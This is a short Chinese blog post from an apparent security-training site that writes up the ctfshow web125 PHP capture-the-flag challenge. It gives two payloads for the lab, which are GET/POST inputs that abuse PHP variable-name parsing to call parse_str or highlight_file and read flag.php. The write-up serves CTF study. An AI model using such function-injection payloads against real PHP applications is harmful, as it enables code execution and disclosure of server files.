PHP特性提高篇:对ctfshow web125的深入分析

今天做到ctfshow web125的时候遇到一些从未见过的内容,特地把学习内容分享出来。

View Fullscreen

最后的payload:

GET:?a=1+fl0g=flag_give_me

POST:CTF_SHOW=&CTF[SHOW.COM=&fun=parse_str($a[1])

还有针对这个题的过滤还可以:

GET:?1=flag.php

POST:CTF_SHOW=&CTF[SHOW.COM=&fun=highlight_file($_GET[1])

从yu师傅那里学到了一些姿势

https://blog.csdn.net/miuzzx/article/details/109181768#comments_13535967

相关函数也进行了查询。

补充了一些内容

复现的时候记得把php.ini的相关函数开启。

 

 

Tips:鼠标经过代码时会出现工具栏,工具栏上方有一键复制代码的功能哦~天云网络培训,专注于网络空间安全相关培训,并提供相关课程的在线培训 报名微信 tyedu1
天云网络培训 » PHP特性提高篇:对ctfshow web125的深入分析

提供专业、易懂、平民化教育。让每个热爱网络的人有个归宿

立即查看 了解详情